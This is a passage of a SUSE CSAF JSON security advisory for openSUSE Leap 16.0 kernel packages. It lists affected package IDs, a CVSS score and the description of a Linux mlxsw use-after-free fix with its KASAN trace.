"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-68799"
},
{
"cve": "CVE-2025-68800",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68800"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmlxsw: spectrum_mr: Fix use-after-free when updating multicast route stats\n\nCited commit added a dedicated mutex (instead of RTNL) to protect the\nmulticast route list, so that it will not change while the driver\nperiodically traverses it in order to update the kernel about multicast\nroute stats that were queried from the device.\n\nOne instance of list entry deletion (during route replace) was missed\nand it can result in a use-after-free [1].\n\nFix by acquiring the mutex before deleting the entry from the list and\nreleasing it afterwards.\n\n[1]\nBUG: KASAN: slab-use-after-free in mlxsw_sp_mr_stats_update+0x4a5/0x540 drivers/net/ethernet/mellanox/mlxsw/spectrum_mr.c:1006 [mlxsw_spectrum]\nRead of size 8 at addr ffff8881523c2fa8 by task kworker/2:5/22043\n\nCPU: 2 UID: 0 PID: 22043 Comm: kworker/2:5 Not tainted 6.18.0-rc1-custom-g1a3d6d7cd014 #1 PREEMPT(full)\nHardware name: Mellanox Technologies Ltd. MSN2010/SA002610, BIOS 5.6.5 08/24/2017\nWorkqueue: mlxsw_core mlxsw_sp_mr_stats_update [mlxsw_spectrum]\nCall Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0xba/0x110\n print_report+0x174/0x4f5\n kasan_report+0xdf/0x110\n mlxsw_sp_mr_stats_update+0x4a5/0x540 drivers/net/ethernet/mellanox/mlxsw/spectrum_mr.c:1006 [mlxsw_spectrum]\n process_one_work+0x9cc/0x18e0\n worker_thread+0x5df/0xe40\n kthread+0x3b8/0x730\n ret_from_fork+0x3e9/0x560\n ret_from_fork_asm+0x1a/0x30\n \u003c/TASK\u003e\n\nAllocated by task 29933:\n kasan_save_stack+0x30/0x50\n kasan_save_track+0x14/0x30\n __kasan_kmalloc+0x8f/0xa0\n mlxsw_sp_mr_route_add+0xd8/0x4770 [mlxsw_spectrum]\n mlxsw_sp_router_fibmr_event_work+0x371/0xad0 drivers/net/ethernet/mellanox/mlxsw/spectrum_router.c:7965 [mlxsw_spectrum]\n process_one_work+0x9cc/0x18e0\n worker_thread+0x5df/0xe40\n kthread+0x3b8/0x730\n ret_from_fork+0x3e9/0x560\n ret_from_fork_asm+0x1a/0x30\n\nFreed by task 29933:\n kasan_save_stack+0x30/0x50\n kasan_save_track+0x14/0x30\n __kasan_save_free_info+0x3b/0x70\n __kasan_slab_free+0x43/0x70\n kfree+0x14e/0x700\n mlxsw_sp_mr_route_add+0x2dea/0x4770 drivers/net/ethernet/mellanox/mlxsw/spectrum_mr.c:444 [mlxsw_spectrum]\n mlxsw_sp_router_fibmr_event_work+0x371/0xad0 drivers/net/ethernet/mellanox/mlxsw/spectrum_router.c:7965 [mlxsw_spectrum]\n process_one_work+0x9cc/0x18e0\n worker_thread+0x5df/0xe40\n kthread+0x3b8/0x730\n ret_from_fork+0x3e9/0x560\n ret_from_fork_asm+0x1a/0x30",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68800",
"url": "https://www.suse.com/security/cve/CVE-2025-68800"
},
{
"category": "external",
"summary": "SUSE Bug 1256646 for CVE-2025-68800",
"url": "https://bugzilla.suse.com/1256646"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
